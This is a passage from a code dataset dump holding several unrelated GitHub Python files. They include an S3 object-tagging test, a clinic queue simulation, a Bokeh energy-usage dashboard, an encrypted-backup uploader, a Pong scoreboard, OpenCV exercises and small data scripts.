input_tag_set to xml like there is in the boto2 tetss\n xml_input_tag_set = \"0011\"\n\n json_policy_document = json.JSONEncoder().encode(policy_document)\n bytes_json_policy_document = bytes(json_policy_document, 'utf-8')\n policy = base64.b64encode(bytes_json_policy_document)\n aws_secret_access_key = s3cfg_global_unique.main_secret_key\n aws_access_key_id = s3cfg_global_unique.main_access_key\n\n signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())\n\n payload = OrderedDict([\n (\"key\", \"foo.txt\"),\n (\"AWSAccessKeyId\", aws_access_key_id),\n (\"acl\", \"private\"), (\"signature\", signature), (\"policy\", policy),\n (\"tagging\", xml_input_tag_set),\n (\"Content-Type\", \"text/plain\"),\n ('file', 'bar')])\n\n r = requests.post(url, files=payload, verify=s3cfg_global_unique.default_ssl_verify)\n self.eq(r.status_code, 204)\n response = client.get_object(Bucket=bucket_name, Key='foo.txt')\n body = self.get_body(response)\n self.eq(body, 'bar')\n\n def test_put_obj_with_tags(self, s3cfg_global_unique):\n \"\"\"\n (operation='Test PutObj with tagging headers')\n (assertion='success')\n \"\"\"\n client = get_client(s3cfg_global_unique)\n bucket_name = self.get_new_bucket(client, s3cfg_global_unique)\n key = 'testtagobj1'\n data = 'A' * 100\n\n tag_set = [{'Key': 'bar', 'Value': ''}, {'Key': 'foo', 'Value': 'bar'}]\n\n put_obj_tag_headers = {\n 'x-amz-tagging': 'foo=bar&bar'\n }\n\n lf = (lambda **kwargs: kwargs['params']['headers'].update(put_obj_tag_headers))\n client.meta.events.register('before-call.s3.PutObject', lf)\n\n client.put_object(Bucket=bucket_name, Key=key, Body=data)\n response = client.get_object(Bucket=bucket_name, Key=key)\n body = self.get_body(response)\n self.eq(body, data)\n\n response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n response_tag_set = response['TagSet']\n tag_set = tag_set\n self.eq(response_tag_set, tag_set)\n\n\n@pytest.mark.sio\nclass TestBucketTagging(TestTaggingBase):\n\n @pytest.mark.fails_on_sio\n @pytest.mark.xfail(reason=\"预期:当没设置桶标签的时候,获取标签返回NoSuchTagSetError\", run=True, strict=True)\n @pytest.mark.merge # merge PR: #464\n def test_set_bucket_tagging(self, s3cfg_global_unique):\n \"\"\"\n 测试-验证设置存储桶的tags\n \"\"\"\n client = get_client(s3cfg_global_unique)\n bucket_name = self.get_new_bucket(client, s3cfg_global_unique)\n\n e = assert_raises(ClientError, client.get_bucket_tagging, Bucket=bucket_name) # won't raise ClientError\n status, error_code = self.get_status_and_error_code(e.response)\n self.eq(status, 404)\n\n # https://github.com/ceph/s3-tests/commit/5b08b26453d8362c87a496b0a9cd448a6c331ddf\n self.eq(error_code, 'NoSuchTagSet')\n\n tags = {\n 'TagSet': [\n {\n 'Key': 'Hello',\n 'Value': 'World'\n },\n ]\n }\n client.put_bucket_tagging(Bucket=bucket_name, Tagging=tags)\n\n response = client.get_bucket_tagging(Bucket=bucket_name)\n self.eq(len(response['TagSet']), 1)\n self.eq(response['TagSet'][0]['Key'], 'Hello')\n self.eq(response['TagSet'][0]['Value'], 'World')\n\n response = client.delete_bucket_tagging(Bucket=bucket_name)\n self.eq(response['ResponseMetadata']['HTTPStatusCode'], 204)\n\n e = assert_raises(ClientError, client.get_bucket_tagging, Bucket=bucket_name)\n status, error_code = self.get_status_and_error_code(e.response)\n self.eq(status, 404)\n self.eq(error_code, 'NoSuchTagSet')\n","repo_name":"sine-io/s3tests-sineio","sub_path":"py3-s3tests/tests/test_s3_tagging_v.py","file_name":"test_s3_tagging_v.py","file_ext":"py","file_size_in_byte":14906,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"9305532344","text":"from collections import deque, Counter\nfrom math import sqrt\nfrom random import random, seed\nfrom numpy import mean, arange, array, std\nfrom matplotlib import pyplot as plt\nfrom scipy import stats\n\n# seed(10)\n\n# A1,A2,A3,W1,D1,D2,D3,D4,D5,D6, H\n\n\n\nclass BasicModel:\n def __init__(self, prob_to_doc=0.5, prob_emergency=0.04, mean_doc_arr_time=1, schedule=[]):\n self.state = [0 for i in range(0, 11)]\n self.schedule = schedule\n self.t_max = 50\n self.time = 0\n self.W1 = 3\n self.NOPTS = 2 # number of optomologists\n self.distribution = stats.geom(1/mean_doc_arr_time)\n\n # Visitor probabilities\n self.prob_1 = 0.5 # probability that 1 person enters building\n self.prob_2 = 0.2 # probability that 2 people enters building\n self.prob_emergency = prob_emergency # probability of having a emergency\n # the probability that somebody has to go to the doctor after visiting one of the assistents\n self.prob_to_doc = prob_to_doc\n\n self.prob_skipsA2 = 0.5\n\n self.prob_skipsO2n = 0.5\n\n # Emergency state\n self.nr_emergencies = 0\n\n def reset_state(self):\n self.state = [0 for i in range(0, 11)]\n\n def skipO2n(self, li: list, fromIndex):\n \"\"\"\n This is a function to shorten the code in the 'moveOPeople' function.\n It determines if a person can skip the O2n state and can skip to the O_(2n+1) state.\n \"\"\"\n for _ in range(li[fromIndex]):\n skipO = random() < self.prob_skipsO2n\n if skipO:\n li[fromIndex + 2] += 1\n else:\n li[fromIndex + 1] += 1\n\n return li\n\n def moveOPeople(self, li: list):\n \"\"\"\n Determines what happens to the people who are at the optomologist when 5 minutes pass.\n \"\"\"\n busyOpts = sum(li[self.W1+1:-2])\n freeOpts = self.NOPTS - busyOpts\n\n li[10] += li[9]\n li[9] = 0\n\n li = self.skipO2n(li, 8)\n li[8] = 0\n\n li[8] += li[7]\n li[7] = 0\n\n li = self.skipO2n(li, 6)\n li[6] = 0\n\n li[6] += li[5]\n li[5] = 0\n\n li = self.skipO2n(li, 4)\n li[4] = 0\n\n # # Add the number of free optomologists to O1\n toAdd = min(freeOpts, li[3])\n li[4] += toAdd\n li[3] -= toAdd\n\n return li\n\n def moveAPeople(self, li: list):\n \"\"\"\n Determines what happens to people who are at one of the assistants.\n\n We assume that the waiting room and the optomologists have already been handled.\n The queue starts moving at the front (aka A3 moves first)\n \"\"\"\n\n # A3 moves to W1 or H\n for _ in range(li[2]):\n to_doc = random() < self.prob_to_doc\n if to_doc:\n li[3] += 1\n else:\n li[-1] += 1 # here they go home already\n li[2] = 0\n\n # A2 to A3\n li[2] += li[1]\n li[1] = 0\n\n # from A1 to A2 or A3\n for _ in range(li[0]):\n skipA4 = random() < self.prob_skipsA2\n if skipA4:\n li[2] += 1\n else:\n li[1] += 1\n li[0] = 0\n\n return li\n\n def visitor(self):\n if len(self.schedule)>0 and self.time <= self.t_max:\n people_to_add = self.schedule[self.time]\n else:\n r = random()\n if 0 < r <= self.prob_1:\n # Add one person\n people_to_add = 1\n\n elif self.prob_1 < r <= self.prob_1 + self.prob_2:\n people_to_add = 2\n else:\n people_to_add = 0\n self.state[0] = self.state[0] + people_to_add\n\n def check_emergency(self):\n\n if random() <= self.prob_emergency:\n # print(\"emergency\")\n self.state[self.W1] += 1\n self.nr_emergencies += 1\n\n def round(self):\n \"\"\"\n 10 minutes pass\n \"\"\"\n self.check_emergency()\n self.state = self.moveOPeople(self.state)\n self.state = self.moveAPeople(self.state)\n self.visitor()\n # print(self.state)\n\n def run(self):\n \"\"\"\n Run one simulation\n \"\"\"\n # Reset variables for next run\n self.reset_state()\n self.nr_emergencies = 0\n self.NOPTS = 1\n nr_waiting_patients = deque()\n arr_time = self.distribution.rvs()\n\n for t in range(self.t_max):\n self.time = t\n if t == arr_time:\n self.NOPTS += 1\n self.round()\n nr_waiting_patients.append(self.state[self.W1])\n # print(nr_waiting_patients)\n\n max_wait = max(nr_waiting_patients)\n mean_wait = mean(nr_waiting_patients)\n throughput = self.state[-1] / (self.t_max * 10 * mean_wait + 1)\n\n wait_counter = Counter(nr_waiting_patients)\n\n print(\"------- last simulation summary -------\")\n print(f\"Throughput: {throughput}\" )\n print(f\"mean number of people waiting: {mean_wait}\")\n print(f\"number of emergencies: {self.nr_emergencies}\")\n print()\n\n return self.schedule, throughput, wait_counter, max_wait, mean_wait\n\n def run_multiple(self, nr_runs):\n\n sum_counter = [0 for i in range(2*self.t_max)]\n sum2_counter = [0 for i in range(2*self.t_max)]\n mean_wait_times = deque()\n halfwidth_wait_times = deque()\n avarage_wait_times = deque()\n max_wait_time = 0\n for _ in range(nr_runs):\n schedule, throughput, wait_counter, max_wait, mean_wait = self.run()\n for c in wait_counter.items():\n sum_counter[c[0]] += c[1]\n sum2_counter[c[0]] += c[1]**2\n if max_wait > max_wait_time:\n max_wait_time = max_wait\n avarage_wait_times.append(mean_wait)\n print(sum_counter)\n print(sum2_counter)\n\n # CI for mean value\n mean_total = mean(avarage_wait_times)\n std_total = std(avarage_wait_times)\n halfwidth = 1.96*std_total/sqrt(nr_runs)\n ci_mean = (mean_total-halfwidth, mean_total+halfwidth)\n\n # determining mean and variances of each value of W\n for i in range(max_wait_time+1):\n mean_x = sum_counter[i] / (self.t_max*nr_runs)\n var_x = sum2_counter[i] / (self.t_max*nr_runs) - mean_x**2\n halfwidth_x = 1.96*sqrt(var_x / nr_runs)\n mean_wait_times.append(mean_x)\n halfwidth_wait_times.append(halfwidth_x)\n\n return array(mean_wait_times), array(halfwidth_wait_times), ci_mean\n\n\ndef plot_results(nr_runs):\n schedule = 75*[0]+25*[2]\n model = BasicModel(0.5, 0, schedule=schedule)\n means, halfwidth, average = model.run_multiple(nr_runs)\n plt.figure()\n labels = arange(len(means))\n plt.bar(labels, means, width=0.5, yerr=halfwidth)\n plt.show()\n\n\ndef plot_multiple(nr_runs):\n schedule1 = [2, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 2, 0, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 2, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 2, 1, 1, 0, 0, 2, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1]\n schedule2 = 50*[1,0]\n model1 = BasicModel(0.5, 0.02)\n model2 = BasicModel(0.5, 0.02, 5)\n model3 = BasicModel(0.5, 0.02, 10)\n y1, dy1, E_y1 = model1.run_multiple(nr_runs)\n y2, dy2, E_y2 = model2.run_multiple(nr_runs)\n y3, dy3, E_y3 = model3.run_multiple(nr_runs)\n print(E_y1)\n print(E_y2)\n print(E_y3)\n fig, ax = plt.subplots(figsize=(12, 6))\n length = min([len(y1), len(y2), len(y3), 15])\n labels = arange(length)\n w = 0.3\n ax.bar(labels - w, y1[:length], width=w, yerr=dy1[:length], label='basic')\n ax.bar(labels, y2[:length], width=w, yerr=dy2[:length], label='with emergencies')\n ax.bar(labels + w, y3[:length], width=w, yerr=dy3[:length], label='with doctor to late')\n plt.xlabel(\"Number of patients in W\")\n plt.ylabel(\"Probability\")\n plt.title(\"Distribution of number of patient in the waiting room\")\n plt.legend()\n plt.show()\n\n\nplot_multiple(10000)\n\nif __name__ == \"__main__\":\n # manySimulations(numberOfSimulations=1000)\n print()","repo_name":"JWapstra/2WB20Model","sub_path":"10minModel.py","file_name":"10minModel.py","file_ext":"py","file_size_in_byte":8239,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"22178548936","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 12 19:27:56 2019\n\n@author: wouternieuwerth\n\"\"\"\n\nfrom bokeh.plotting import figure\nfrom bokeh.models import RadioButtonGroup, Panel, ColumnDataSource, LinearColorMapper\nfrom bokeh.models.widgets import DatePicker\nfrom bokeh.layouts import gridplot\nfrom bokeh.palettes import inferno\nimport numpy as np\nimport pandas as pd\nimport datetime\nfrom math import floor\nfrom pytz import timezone\nfrom datetime import date\n\nTOOLS = \"hover,save,pan,box_zoom,reset,wheel_zoom\"\n\npalette = inferno(25)\ncolor_mapper = LinearColorMapper(palette=palette)\n\n# standaardwaarden definieren:\nusageType = 'gastotalusage'\nstart = datetime.date(2017,1,1)\nstop = datetime.date.today()\n\n#------------------------------------------------------------------------------\n# accept a dataframe, remove outliers, return cleaned data in a new dataframe\n# see http://www.itl.nist.gov/div898/handbook/prc/section1/prc16.htm\n#------------------------------------------------------------------------------\ndef remove_outlier(df_in, col_name):\n \"\"\"accept a dataframe, remove outliers, return cleaned data in a new dataframe\"\"\"\n q1 = df_in[col_name].quantile(0.25)\n q3 = df_in[col_name].quantile(0.75)\n iqr = q3-q1 #Interquartile range\n fence_low = q1-1.5*iqr\n fence_high = q3+1.5*iqr\n df_out = df_in.loc[(df_in[col_name] > fence_low) & (df_in[col_name] < fence_high)]\n return df_out\n\ndef barchart_datepicker(df):\n \n def make_dataset(df, usageType='gastotalusage', start=datetime.date(2015,1,1), stop=datetime.date.today()):\n \n if type(start) == str:\n start = datetime.datetime.strptime(start, '%Y-%m-%d').date()\n if type(stop) == str:\n stop = datetime.datetime.strptime(stop, '%Y-%m-%d').date()\n \n start_milliseconds = ((start - datetime.date(1970,1,1)).total_seconds() * 1000)\n stop_milliseconds = ((stop - datetime.date(1970,1,1)).total_seconds() * 1000) + (86400000-1) # Plus 1 dag minus - milliseconde = einde van die dag\n \n if usageType == 'powertotalusage': # select both tariff1totalusage and tariff2totalusage\n \n df_verwerkt1 = df.loc[(df['attributeName'] == 'tariff1totalusage') & (df['time'] >= start_milliseconds) & (df['time'] <= stop_milliseconds)]\n df_verwerkt1 = df_verwerkt1.sort_values('time')\n df_verwerkt1 = df_verwerkt1.replace(0,np.NaN)\n df_verwerkt1 = df_verwerkt1.fillna(method='ffill')\n df_verwerkt1 = df_verwerkt1.fillna(method='bfill') # nodig om eerste rij te fixen.\n df_verwerkt1['time'] = pd.to_datetime(df_verwerkt1['time'], unit='ms', utc=True)\n df_verwerkt1['time'] = df_verwerkt1['time'].apply(lambda x: x.astimezone(timezone('Europe/Amsterdam')))\n # df_verwerkt1['hour'] = df_verwerkt1['time'].dt.hour\n df_verwerkt1['minutes'] = (df_verwerkt1['time'].dt.hour * 60) + df_verwerkt1['time'].dt.minute\n # df_verwerkt1['dayofweek'] = df_verwerkt1['time'].dt.dayofweek\n df_verwerkt1['difference'] = df_verwerkt1['value'].diff()\n df_verwerkt1['difference'] = df_verwerkt1['difference'].fillna(0)\n df_verwerkt1[df_verwerkt1['difference'] > 1000] = 0 # sprong naar Nederhoven uitfilteren\n df_verwerkt1 = df_verwerkt1[df_verwerkt1['difference'] > 0]\n \n # df_verwerkt1 = remove_outlier(df_verwerkt1, 'difference')\n \n df_verwerkt2 = df.loc[(df['attributeName'] == 'tariff2totalusage') & (df['time'] >= start_milliseconds) & (df['time'] <= stop_milliseconds)]\n df_verwerkt2 = df_verwerkt2.sort_values('time')\n df_verwerkt2 = df_verwerkt2.replace(0,np.NaN)\n df_verwerkt2 = df_verwerkt2.fillna(method='ffill')\n df_verwerkt2 = df_verwerkt2.fillna(method='bfill') # nodig om eerste rij te fixen.\n df_verwerkt2['time'] = pd.to_datetime(df_verwerkt2['time'], unit='ms', utc=True)\n df_verwerkt2['time'] = df_verwerkt2['time'].apply(lambda x: x.astimezone(timezone('Europe/Amsterdam')))\n # df_verwerkt2['hour'] = df_verwerkt2['time'].dt.hour\n df_verwerkt2['minutes'] = (df_verwerkt2['time'].dt.hour * 60) + df_verwerkt2['time'].dt.minute\n # df_verwerkt2['dayofweek'] = df_verwerkt2['time'].dt.dayofweek\n df_verwerkt2['difference'] = df_verwerkt2['value'].diff()\n df_verwerkt2['difference'] = df_verwerkt2['difference'].fillna(0)\n df_verwerkt2[df_verwerkt2['difference'] > 1000] = 0 # sprong naar Nederhoven uitfilteren\n df_verwerkt2 = df_verwerkt2[df_verwerkt2['difference'] > 0]\n \n # df_verwerkt2 = remove_outlier(df_verwerkt2, 'difference')\n \n df_verwerkt = pd.concat([df_verwerkt1, df_verwerkt2], ignore_index=True)\n \n groupby = df_verwerkt.groupby('minutes').sum()\n \n else:\n df_verwerkt = df.loc[(df['attributeName'] == usageType) & (df['time'] >= start_milliseconds) & (df['time'] <= stop_milliseconds)]\n df_verwerkt = df_verwerkt.sort_values('time')\n df_verwerkt = df_verwerkt.replace(0,np.NaN)\n df_verwerkt = df_verwerkt.fillna(method='ffill')\n df_verwerkt = df_verwerkt.fillna(method='bfill') # nodig om eerste rij te fixen.\n df_verwerkt['time'] = pd.to_datetime(df_verwerkt['time'], unit='ms', utc=True)\n df_verwerkt['time'] = df_verwerkt['time'].apply(lambda x: x.astimezone(timezone('Europe/Amsterdam')))\n # df_verwerkt['hour'] = df_verwerkt['time'].dt.hour\n df_verwerkt['minutes'] = (df_verwerkt['time'].dt.hour * 60) + df_verwerkt['time'].dt.minute\n # df_verwerkt['dayofweek'] = df_verwerkt['time'].dt.dayofweek\n df_verwerkt['difference'] = df_verwerkt['value'].diff()\n df_verwerkt['difference'] = df_verwerkt['difference'].fillna(0)\n df_verwerkt[df_verwerkt['difference'] > 1000] = 0 # sprong naar Nederhoven uitfilteren\n df_verwerkt = df_verwerkt[df_verwerkt['difference'] > 0]\n \n # df_verwerkt = remove_outlier(df_verwerkt, 'difference')\n \n groupby = df_verwerkt.groupby('minutes').sum()\n \n print('startdatum zoals verwerkt: ' + str(start))\n print('einddatum zoals verwerkt: ' + str(stop))\n \n return ColumnDataSource(data=groupby)\n \n def make_plot(src):\n \n # Deze regel maakt een dict met de vorm {0: '00:00', 1: '00:01', ... t/m 1440 voor alle minuten van de dag.\n # In feite zet deze regel alle minuten van 0 t/m 1440 om in een string met tijd voor de x-as.\n d = {i:f\"{floor(i/60):02d}\" + \":\" + f\"{int(i%60):02d}\" for i in range(1440)}\n \n p = figure(title='Bar chart', x_range=(0, 1440), tools=TOOLS, background_fill_color=\"#fafafa\")\n p.sizing_mode = 'stretch_both' # https://docs.bokeh.org/en/latest/docs/user_guide/layout.html\n p.vbar(x='minutes', bottom=0, top='difference', source=src, width=0.9, color={'field': 'difference', 'transform': color_mapper})\n\n p.y_range.start = 0\n p.xaxis.axis_label = 'Tijd'\n p.xaxis.major_label_overrides = d\n p.yaxis.axis_label = 'Verbruik'\n p.grid.grid_line_color=\"white\"\n return p\n\n def update_radios(attr, old, new):\n \n # Get the selected items for the graph\n # ...\n selected = radio_button_group.active\n \n global usageType\n \n # Koppel de selectie aan de juiste gegevens uit het DataFrame\n if selected == 0:\n usageType = 'gastotalusage'\n p.title.text = 'Gasverbruik per minuut'\n elif selected == 1:\n usageType = 'tariff1totalusage'\n p.title.text = 'Stroomtarief 1 verbruik'\n elif selected == 2:\n usageType = 'tariff2totalusage'\n p.title.text = 'Stroomtarief 2 verbruik'\n elif selected == 3:\n usageType = 'powertotalusage'\n p.title.text = 'Stroomverbruik totaal'\n \n print('Update usageType: ' + str(usageType))\n \n # update data\n new_src = make_dataset(df, usageType=usageType, start=start, stop=stop)\n src.data.update(new_src.data)\n \n def update_start_date(attr, old, new):\n \n print('New start date: ' + str(new))\n \n global start\n start = new\n \n # update data\n new_src = make_dataset(df, usageType=usageType, start=new, stop=stop)\n src.data.update(new_src.data)\n \n def update_end_date(attr, old, new):\n \n print('New stop date: ' + str(new))\n \n global stop\n stop = new\n \n # update data\n new_src = make_dataset(df, usageType=usageType, start=start, stop=new)\n src.data.update(new_src.data)\n\n radio_button_group = RadioButtonGroup(\n labels=[\"Gas\", \"Tarief 1\", \"Tarief 2\", \"Stroom totaal\"], active=0)\n \n radio_button_group.on_change('active', update_radios)\n \n datepicker_start = DatePicker(title='Startdatum',min_date=date(2015,1,1),max_date=date.today())\n datepicker_stop = DatePicker(title='Einddatum',min_date=date(2015,1,1),max_date=date.today())\n \n datepicker_start.on_change('value', update_start_date)\n datepicker_stop.on_change('value', update_end_date)\n \n # initial execution\n src = make_dataset(df, 'gastotalusage')\n p = make_plot(src)\n \n # make a grid\n grid = gridplot([[p],[radio_button_group], [datepicker_start], [datepicker_stop]])\n grid.sizing_mode = 'scale_width'\n \n tab = Panel(child = grid, title = 'Bar chart')\n \n print(\"barchart() uitgevoerd\")\n \n return tab","repo_name":"WouterNieuwerth/Pimatic-Bokeh-dashboard-v2","sub_path":"scripts/barchart_datepicker.py","file_name":"barchart_datepicker.py","file_ext":"py","file_size_in_byte":9786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27573836202","text":"from config import *\nfrom cryptlog import *\nfrom dirscanner import *\nfrom debug import *\nfrom fileinfo import *\n\nclass Uploader(object):\n \"\"\"\n class to process uploads to the CryptStore\n \"\"\"\n\n def __init__(self, cryptstore):\n \"\"\"\n creates an instance\n Parameters:\n - cryptstore\n CryptStore instance to use\n \"\"\"\n self._cryptstore = cryptstore\n\n def _debug(self, action, entry, fileinfo):\n \"\"\"\n logs debug information\n Parameters:\n - action\n action to log\n - entry\n corresponding cryptstore entry\n - fileinfo\n corresponding file info\n \"\"\"\n debuglog = DebugLogger(\"cryptbox\", \"Uploader\")\n debuglog.debug_value(\"fileinfo.relative_path\", fileinfo.get_relative_path())\n debuglog.debug_value(\"fileinfo.exist\", fileinfo.exists())\n debuglog.debug_value(\"fileinfo.file_timestamp\", fileinfo.get_file_timestamp())\n debuglog.debug_value(\"fileinfo.state_timestamp\", fileinfo.get_state_timestamp())\n if entry:\n debuglog.debug_value(\"entry.state\", entry.get_state())\n debuglog.debug_value(\"entry.timestamp\", entry.get_timestamp())\n else:\n debuglog.debug_value(\"entry\", None)\n debuglog.debug(action)\n\n \n def run(self):\n \"\"\"\n executes the Uploader\n \"\"\"\n self.check_for_delete()\n self.check_for_upload()\n\n def check_for_delete(self):\n \"\"\"\n check if files should be deleted\n \"\"\"\n debuglog = DebugLogger(\"cryptbox\", \"Uploader.check_for_delete\")\n database = FileInfoDatabase()\n for fileinfo in database.get_all():\n fileinfo.scan()\n if not fileinfo.exists():\n if fileinfo.get_state() != FILEINFO_STATE_DELETED:\n delete_flag = True\n filepath = fileinfo.get_relative_path()\n file_timestamp = fileinfo.get_state_timestamp()\n entry = self._cryptstore.get_entry(filepath)\n if entry:\n entry_timestamp = entry.get_timestamp()\n if entry.get_state() != FILEINFO_STATE_DELETED:\n if entry_timestamp > file_timestamp:\n self._debug(\"file not deleted\", entry, fileinfo)\n delete_flag = False\n if delete_flag and entry.get_state() != FILEINFO_STATE_DELETED:\n self._debug(\"file deleted\", entry, fileinfo)\n self._cryptstore.delete_file(entry)\n cryptlog(\"%s deleted.\" % filepath)\n\n def check_for_upload(self):\n \"\"\"\n check if files should be uploaded\n \"\"\"\n config = CryptBoxConfig()\n srcpath = config.get_source_directory()\n scanner = DirScanner(srcpath)\n for fileinfo in scanner.get_list().get_entries():\n upload_flag = False\n fileinfo.scan()\n relpath = fileinfo.get_relative_path()\n storeentry = self._cryptstore.get_entry(relpath)\n if storeentry:\n file_timestamp = fileinfo.get_file_timestamp()\n store_timestamp = storeentry.get_timestamp()\n if file_timestamp > store_timestamp:\n upload_flag = True\n else:\n upload_flag = True\n if upload_flag:\n self._debug(\"file uploaded\", storeentry, fileinfo)\n self._cryptstore.upload_file(fileinfo)\n cryptlog(\"%s uploadad.\" % relpath)\n else:\n self._debug(\"no action\", storeentry, fileinfo)\n","repo_name":"joskulj/cryptbox","sub_path":"cryptbox/uploader.py","file_name":"uploader.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"32853154884","text":"import sys\ninput = sys.stdin.readline\n\nt = int(input())\nfor _ in range(t):\n koong = [1, 1, 2, 4]\n n = int(input())\n for i in range(4, n+1):\n koong.append(koong[i-1]+koong[i-2]+koong[i-3]+koong[i-4])\n print(koong[n])\n","repo_name":"DohyunJegal/Baekjoon","sub_path":"etc/silver/9507.py","file_name":"9507.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6774928293","text":"# coding=utf-8\n\"\"\"\n股票日行情\ntushare learning: https://tushare.pro/document/1?doc_id=131\nCreated on 2020-02-23\n@author: lizhenkun\n@contact: 1292746975@qq.com\n\"\"\"\nimport os\nimport pandas as pd\n\nts_code='002713.SZ'\ncsv_file = '{0}.csv'.format(ts_code)\nreorg_file = 'reorg_{0}.csv'.format(ts_code)\n# print(df)\ndf = pd.read_csv(csv_file)\ndf = df[['trade_date', 'open', 'high', 'low', 'close', 'change']]\ndf.sort_values(by=['trade_date'], inplace=True)\ndf.reset_index(0, drop=True, inplace=True)\n# 根据收盘价计算涨跌幅\ndf['change'] = df['close'].pct_change(1)\ndf.to_csv(reorg_file, index=False)\nprint(df)\n# df = pd.read_csv(reorg_file)\n# print(df)\n\n","repo_name":"lizhenkun/quant-trade-learning","sub_path":"src/data_crawler/tushare/reorgnize_data.py","file_name":"reorgnize_data.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38286715467","text":"from paddle import Turtle\n\n\nclass ScoreBoard(Turtle):\n def __init__(self):\n super().__init__()\n self.l_score = 0\n self.r_right = 0\n self.color('white')\n self.penup()\n self.hideturtle()\n self.goto(0, 255)\n self.write(f\"{self.l_score} {self.r_right}\", align='center', font=('Courier', 35, 'normal'))\n\n def score_lef(self):\n self.l_score += 1\n self.clear()\n self.write(f\"{self.l_score} {self.r_right}\", align='center', font=('Courier', 35, 'normal'))\n\n\n def score_right(self):\n self.r_right += 1\n self.clear()\n self.write(f\"{self.l_score} {self.r_right}\", align='center', font=('Courier', 35, 'normal'))\n","repo_name":"eyoair21/Python_projects","sub_path":"new_pong/ex_2/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17960128518","text":"import cv2 \nimport numpy as np\nbasePath = \"Computer-Vision-py/DATA/\"\n\ngiraffes = cv2.imread(basePath + \"giraffes.jpg\")\ngrayGiraffes = cv2.imread(basePath + \"giraffes.jpg\", 0)\n# giaraffes = cv2.cvtColor(giaraffes, c)\ncv2.imshow(\"giraffes\", giraffes)\n\n# 2\nt1, binaryThesh = cv2.threshold(\n grayGiraffes,\n giraffes.max() // 2,\n 255,\n cv2.THRESH_BINARY\n)\ncv2.imshow(\"binaryThresh\", binaryThesh)\n\n# 3\nhsvGiraffes = cv2.cvtColor(giraffes, cv2.COLOR_RGB2HSV)\ncv2.imshow(\"hsvGiraffe\", hsvGiraffes)\n\n# 4\nkernel = np.ones((4,4), np.float32) / 10\nblurredGiraffe = cv2.filter2D(\n giraffes,\n -1,\n kernel\n)\ncv2.imshow(\"blurredGiraffe\", blurredGiraffe)\n\n# 5 \nsobelX = cv2.Sobel(\n grayGiraffes,\n cv2.CV_64F,\n 1,\n 0,\n None,\n 5\n)\ncv2.imshow(\"sobelX\", sobelX)\ncv2.destroyAllWindows() if ( cv2.waitKey(0) & 0xFF == 27 ) else None\n","repo_name":"Abukar-1000/myCompVision","sub_path":"imgProcessing/assessment3.py","file_name":"assessment3.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18728268854","text":"import unittest\nfrom scripts.transform.create_unique_holders_set import extract_unique_holders \n\n\nclass TestExtractUniqueHolders(unittest.TestCase):\n\n def test_extract_unique_holders(self):\n # Define a sample input dictionary\n holders_data = {\n 'AAPL': {\n 'institutional_holders': [\n {'Holder': 'Institution 1'},\n {'Holder': 'Institution 2'},\n {'Holder': 'Institution 1'}, # Duplicate, should be ignored\n ],\n 'mutual_fund_holders': [\n {'Holder': 'Fund A'},\n {'Holder': 'Fund B'},\n ],\n },\n 'GOOGL': {\n 'institutional_holders': [\n {'Holder': 'Institution 3'},\n ],\n 'mutual_fund_holders': [],\n },\n }\n\n # Call the function to get the result\n result = extract_unique_holders(holders_data)\n\n # Define the expected output based on the sample input, sorted alphabetically\n expected_result = [\n {'holder_id': 'h00001', 'holder_name': 'Fund A'},\n {'holder_id': 'h00002', 'holder_name': 'Fund B'},\n {'holder_id': 'h00003', 'holder_name': 'Institution 1'},\n {'holder_id': 'h00004', 'holder_name': 'Institution 2'},\n {'holder_id': 'h00005', 'holder_name': 'Institution 3'},\n ]\n\n # Assert that the result matches the expected output\n self.assertEqual(result, expected_result)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"zabull1/SP500-Companies-ETL-and-Data-Modeling-Project","sub_path":"tests/test_create_unique_holders_set.py","file_name":"test_create_unique_holders_set.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18192181442","text":"import logging\nimport os\nimport urllib3\n\nclass Request():\n def __init__(self, user_agent):\n self.user_agent_ = user_agent\n\n # Request a given uri according to the given method (GET)\n def get(self, resource_uri, decode=True):\n try:\n http = urllib3.PoolManager()\n req = http.request('GET', resource_uri, { 'User-Agent' : self.user_agent_ })\n except:\n logging.error(\"[Http][Request] Unable to GET '%s'\" % (resource_uri))\n raise\n if decode:\n return req.data.decode('utf-8')\n return req.data\n\n def download(self, resource_uri, destination_path):\n data = self.get(resource_uri, decode=False)\n destination_path = str(\"%s/%s\" % (destination_path, os.path.split(resource_uri)[-1]))\n try:\n out = open(destination_path, \"wb\")\n out.write(data)\n except:\n logging.error(\"[Http][Request] Unable to write to '%s'\" % (destination_path))\n 